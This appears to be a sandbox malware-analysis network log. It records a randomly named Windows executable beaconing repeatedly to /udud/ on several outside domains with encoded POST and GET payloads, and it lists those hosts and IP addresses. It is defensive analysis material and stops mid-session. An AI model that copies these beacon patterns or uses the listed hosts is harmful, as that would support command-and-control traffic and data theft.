                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                66 | 192.168.11.30 | 49896 | 91.195.240.123 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:58.404426098 CEST | 727 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.l7aeh.us
                                                                                                Referer: http://www.l7aeh.us/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=knWG9lgzPXFJbQRIw/j2n6NZ3BJU9VwQESxLbt+mW8gh32Scra2OnaKuEh2cwi6fPAnh3g2jlXdln1o+5LYTU29OFmrPyJay18zBsDy7gEMzYGVnTpRfnsYQBlPlrvE6fwFHIP7swd7zbwUsOSozw/hwchus/oA8YSM7JF9+8PgXOnrk/SpnZHWNv+bLMvor1g==
                                                                                                May 27, 2024 12:35:58.594926119 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:35:58 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                67 | 192.168.11.30 | 49897 | 91.195.240.123 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:36:01.122879982 CEST | 747 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.l7aeh.us
                                                                                                Referer: http://www.l7aeh.us/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=knWG9lgzPXFJKAhIycb2haNarRJUolwUES9LbsK2XOUh3SWcqfKOr6KuQx2Z9C7TPA7p3l2jlXJlnxs+54wQVm9MIGrJv5ay18zBsHaRgEEzZ2FnQL5c5cYTJFPlvvE+fwF1IOXSwfDzb1wsODo8+/hyDxvPxZowBBYGFEJ55etyCQa+iRdlKnqgz/2jOtpwog9n4VxGJmYIHjLM6clasrE=
                                                                                                May 27, 2024 12:36:01.313148975 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:36:01 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                68 | 192.168.11.30 | 49898 | 91.195.240.123 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:36:03.842334032 CEST | 1664 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.l7aeh.us
                                                                                                Referer: http://www.l7aeh.us/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=[TRUNCATED]
                                                                                                May 27, 2024 12:36:04.032671928 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:36:03 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                69 | 192.168.11.30 | 49899 | 91.195.240.123 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:36:06.561853886 CEST | 473 | OUT | GET /udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:36:06.799084902 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 27 May 2024 10:36:06 GMT
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                transfer-encoding: chunked
                                                                                                vary: Accept-Encoding
                                                                                                x-powered-by: PHP/8.1.17
                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                pragma: no-cache
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vZfSQlyoenW7FiQW009uFuaKcMnNFrDJ7SyVW/QTWmDFE2E7HNPzl1TA/mmwxM4mQpueHXtyaevKk2mklSVILg==
                                                                                                last-modified: Mon, 27 May 2024 10:36:06 GMT
                                                                                                x-cache-miss-from: parking-6cfd44ff49-zdvmn
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: 844<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vZfSQlyoenW7FiQW009uFuaKcMnNFrDJ7SyVW/QTWmDFE2E7HNPzl1TA/mmwxM4mQpueHXtyaevKk2mklSVILg==><head><meta charset="utf-8"><title>l7aeh.us&nbsp;-&nbsp;l7aeh Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="l7aeh.us is your first and best source for all of the information youre looking for. From general topics to more


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.11.30 | 49900 | 183.111.161.243 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:36:12.299228907 CEST | 745 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.grimfilm.co.kr
                                                                                                Referer: http://www.grimfilm.co.kr/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:36:12.748039007 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:12 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://grimfilm.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.11.30 | 49901 | 183.111.161.243 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:36:15.124752998 CEST | 765 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.grimfilm.co.kr
                                                                                                Referer: http://www.grimfilm.co.kr/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:36:15.585922956 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://grimfilm.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.11.30 | 49902 | 183.111.161.243 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:36:17.939718962 CEST | 1682 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.grimfilm.co.kr
                                                                                                Referer: http://www.grimfilm.co.kr/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:36:18.387840033 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://grimfilm.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                                Content-Encoding: gzip


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                73 | 192.168.11.30 | 49903 | 183.111.161.243 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:36:20.767832041 CEST | 479 | OUT | GET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:36:21.198863029 CEST | 475 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:21 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 0
                                                                                                Connection: close
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                X-Redirect-By: WordPress
                                                                                                Location: http://grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                74 | 192.168.11.30 | 49904 | 3.64.163.50 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:36:26.393095016 CEST | 745 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.mindfreak.live
                                                                                                Referer: http://www.mindfreak.live/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=UC8vfBirPjIkobDJtd1TiWp5QHSbNI0Jw962rLRkBugoWH0pA3Wk+FyD7RHQEmGFnjxv1v6jQxVIch8jGZMWzgJXdnnFsr/5hKkVEK2VmKkztbFkX4zIlo0s9eZHiJsB1Wx7fmZmMAZyJ5AcVG5YaqvoYNr4Bx0eIZXYjmHskb3yPILUOQwVaHZcP6G9rR047w==
                                                                                                May 27, 2024 12:36:26.578759909 CEST | 292 | IN | HTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:26 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                75 | 192.168.11.30 | 49905 | 3.64.163.50 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:36:29.112955093 CEST | 765 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.mindfreak.live
                                                                                                Referer: http://www.mindfreak.live/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=UC8vfBirPjIkq4LJv6hTpWp4VHSbfI1hw9m2rKV0ULIoXmEpRGWkuVyDzxHVb2GOnj9R1v2jQxRIcgsjHugRywJVSHnHiL/5hKkVEKj+mK8zsr1kWabL7Y0v0+ZHmJsF1WxJfnEJMGdyJ8scVURZTqvyFdq9ERVOBdvHjUHPsLqHOf6OTTEXJnlxT7rVpT1jm6yovSlXS4CipPh6xfN7fp8=
                                                                                                May 27, 2024 12:36:29.299985886 CEST | 292 | IN | HTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:29 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                76 | 192.168.11.30 | 49906 | 3.64.163.50 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:36:31.832983017 CEST | 1682 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.mindfreak.live
                                                                                                Referer: http://www.mindfreak.live/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:36:32.020076036 CEST | 292 | IN | HTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:31 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                77 | 192.168.11.30 | 49907 | 3.64.163.50 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:36:34.548211098 CEST | 479 | OUT | GET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:36:34.733323097 CEST | 292 | IN | HTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:34 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                78 | 192.168.11.30 | 49908 | 116.203.164.244 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:36:48.771430016 CEST | 745 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.wp-bits.online
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.wp-bits.online
                                                                                                Referer: http://www.wp-bits.online/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=AanSmS2RacimAiI88wrBrg7RovqaHlQtcEVhwccbbEZOLJBK2burTpVGhzsGa4gKhyRh/A998BtOdp2t7HGKk6AMfJdlE2patJzhwRx4uu4X86fPfAlE2kEMJTh1aNzL0lBp0Gl6/sysnAAPOT6UclD3T1enkVLWTjB+3qUirudsZv70JkO0x2t2nRDiNzHpUw==
                                                                                                May 27, 2024 12:36:48.968434095 CEST | 346 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:36:48 GMT
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Content-Encoding: br


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                79  192.168.11.30  49909  116.203.164.244  80  7584  C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                May 27, 2024 12:36:51.487436056 CEST  765  OUT  POST /udud/ HTTP/1.1
                                                                                                Host: www.wp-bits.online
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.wp-bits.online
                                                                                                Referer: http://www.wp-bits.online/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:36:51.684880972 CEST  346  IN  HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:36:51 GMT
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Content-Encoding: br


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                80  192.168.11.30  49910  116.203.164.244  80  7584  C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                May 27, 2024 12:36:54.206783056 CEST  1682  OUT  POST /udud/ HTTP/1.1
                                                                                                Host: www.wp-bits.online
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.wp-bits.online
                                                                                                Referer: http://www.wp-bits.online/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:36:54.405515909 CEST  346  IN  HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:36:54 GMT
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Content-Encoding: br


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                81  192.168.11.30  49911  116.203.164.244  80  7584  C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
